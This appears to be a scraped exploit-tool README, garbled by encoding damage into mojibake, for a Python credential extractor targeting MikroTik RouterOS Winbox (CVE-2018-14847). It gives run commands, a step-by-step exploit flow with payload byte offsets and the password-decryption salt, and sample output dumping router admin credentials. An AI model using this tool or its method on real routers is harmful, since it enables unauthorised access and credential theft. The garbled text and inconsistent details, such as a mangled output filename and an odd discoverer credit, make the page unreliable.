## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MOURAFUSETI-VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS
# ๆธ้ๆต่ฏๅทฅๅ
ท โ /็ฝ็ป
็จไบ็ฝ็ปๅฎก่ฎกๅๆธ้ๆต่ฏ็่ๆฌไปๅบใ ่ฏทไป
ๅจ่ทๅพๆญฃๅผๆๆ็่ฎพๅคไธไฝฟ็จใ
* * *
## CVE-2018-14847 โ MikroTik Winbox Credential Extractor
### ๆ่ฟฐ
ๅฉ็จ MikroTik RouterOS Winbox ๆๅกไธญ็ๆช็ป่บซไปฝ้ช่ฏ็ๆไปถ่ฏปๅๆผๆดใๆไปถๅค็็จๅบ๏ผๅค็็จๅบ ID 2๏ผๆช้ช่ฏ่บซไปฝ๏ผๅ
่ฎธๅค้จๆปๅป่
่ฏปๅๅ
ๅซ่ฎพๅคๆๆ็จๆทๅๅฏ็ ็ `user.dat` ๆไปถใ
ๅฏ็ ไฝฟ็จ XOR ๅ ๅฏๅญๅจ๏ผๅฏ้ฅไธบ `MD5(usuario + "283i4jfkai3389")`ใ่ฏฅ่ๆฌไผ่ชๅจๅฎๆ่งฃๅฏใ
### ๅๅฝฑๅ็ๆฌ
ๅๆฏ| ๅๅฝฑๅ่ณ| ไฟฎๅค็ๆฌ
---|---|---
Stable| 6.42| 6.42.1
Long-term| 6.40.7| 6.40.8
RC| 6.42| 6.43
### ่ฆๆฑ
* Python 3.x๏ผๆ ้ๅค้จไพ่ต๏ผ
* ็ฎๆ ไธ็ซฏๅฃ 8291๏ผWinbox๏ผๅฏ่ฎฟ้ฎ
### ็จๆณ
root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291
### ็คบไพ
root@kitploit:~
# ้ป่ฎค็ฎๆ ็ซฏๅฃ 8291
python3 cve_2018_14847.py 192.168.1.1
# ่ชๅฎไน็ซฏๅฃ
python3 cve_2018_14847.py 192.168.1.1 --port 8291
### ๆผๆดๅฉ็จๆต็จ
root@kitploit:~
1. ่ฟๆฅๅฐ 8291 ็ซฏๅฃ (Winbox)
โ
2. ๅ้ FIRST_PAYLOAD โ ๆๅผไผ่ฏ + ่ฏทๆฑ /flash/rw/store/user.dat
โ
3. ไปๅๅบ็็ฌฌ 38 ๅญ่ๆๅ Session ID
โ
4. ๅฐ Session ID ๆณจๅ
ฅ SECOND_PAYLOAD ็็ฌฌ 19 ๅญ่
โ
5. ๅ้ SECOND_PAYLOAD โ ่ฏปๅ user.dat ๆไปถ
โ
6. ่งฃๆ M2 ๆก็ฎ โ ๆๅ็จๆทๅๅ ๅฏๅฏ็
โ
7. ่งฃๅฏๅฏ็ ๏ผXOR ไธ MD5(usuario + salt)
โ
8. ๆพ็คบๅญๆฎๅนถไฟๅญๅฐๆไปถ
### ้ขๆ่พๅบ
root@kitploit:~
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
CVE-2018-14847 โ MikroTik Winbox Credential Dump
Unauthenticated File Read + Password Decryption
ๅๅฝฑๅ็ๆฌ: RouterOS 6.29 โ 6.42 (< 6.40.8 / 6.42.1)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
็ฎๆ : 192.168.1.1:8291
ๆฅๆ : 2026-05-20 18:06:58
[*] ๆญฃๅจ่ฟๆฅ 192.168.1.1:8291 ...
[+] ๅทฒ่ฟๆฅๅฐ Winbox ๆๅกใ
[*] ๅ้ payload 1๏ผๆไปถ่ฏทๆฑ๏ผ...
[+] ๆถๅฐๅๅบ (84 ๅญ่). Session ID: 0x35
[*] ๅ้ payload 2๏ผ่ฏปๅ user.dat๏ผ...
[+] ๆถๅฐๆฐๆฎ (312 ๅญ่).
[*] ๆญฃๅจๅๆ user.dat (257 ๅญ่ๆๆๆฐๆฎ) ...
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
ๆๅ็ๅญๆฎ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
็จๆท : admin
ๅฏ็ : senha123
็ปๅ : admin:senha123
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] ๆพๅฐ 1 ไธชๅญๆฎใ
[+] ็ปๆๅทฒไฟๅญ่ณ: mikrotik_1192.168.1.1_20260520_180658.txt
### ่พๅบๆไปถ
็ปๆ่ชๅจไฟๅญ่ณ๏ผ
root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt
็คบไพ: `mikrotik_192.168.1.1_20260520_180658.txt`
ๅ
ๅซ๏ผ็ฎๆ IPใๆฅๆใCVEใๅๅฝฑๅ็ๆฌไปฅๅๆๆ `็จๆท:ๅฏ็ ` ๅฏนใ
### ๅ่
* CVE: CVE-2018-14847
* Exploit-DB: EDB-ID #45170
* ๅๅงๅ็ฐ่
: Omid Shojaei (@Dmitriy_area51)
* ๅ
ฌๅผๆซ้ฒ: 2018ๅนด4ๆ
* * *
## ๆไปถๅคน็ปๆ
root@kitploit:~
/rede/
โโโ README.md # ๆฌๆไปถ
โโโ cve_2018_14847.py # MikroTik Winbox Credential Extractor
โโโ pentest_cgnat_100.64.0.0.md # CGNAT ๆธ้ๆต่ฏๆฅๅ
โโโ pentest_roteador_192.168.2.1.md # ่ทฏ็ฑๅจๆธ้ๆต่ฏๆฅๅ
โโโ mikrotik_<IP>_<TIMESTAMP>.txt # ่ๆฌ็ๆ็็ปๆ
* * *
> **ๆณๅพๅฃฐๆ๏ผ** ่ฟไบๅทฅๅ
ทไป
้ๅจๆๆ็ฏๅขไธญไฝฟ็จใๆช็ปๆๆๅฏน็ฌฌไธๆน็ณป็ปๆง่กๅฑไบ็ฏ็ฝช่กไธบ๏ผไพๆฎๅทด่ฅฟ็ฌฌ12.737/2012ๅทๆณๅพ๏ผๅก็ฝ็ณๅจยท่ฟชๅ
ๆผๆณ๏ผๅๅทด่ฅฟๅๆณ็ฌฌ154-Aๆกใ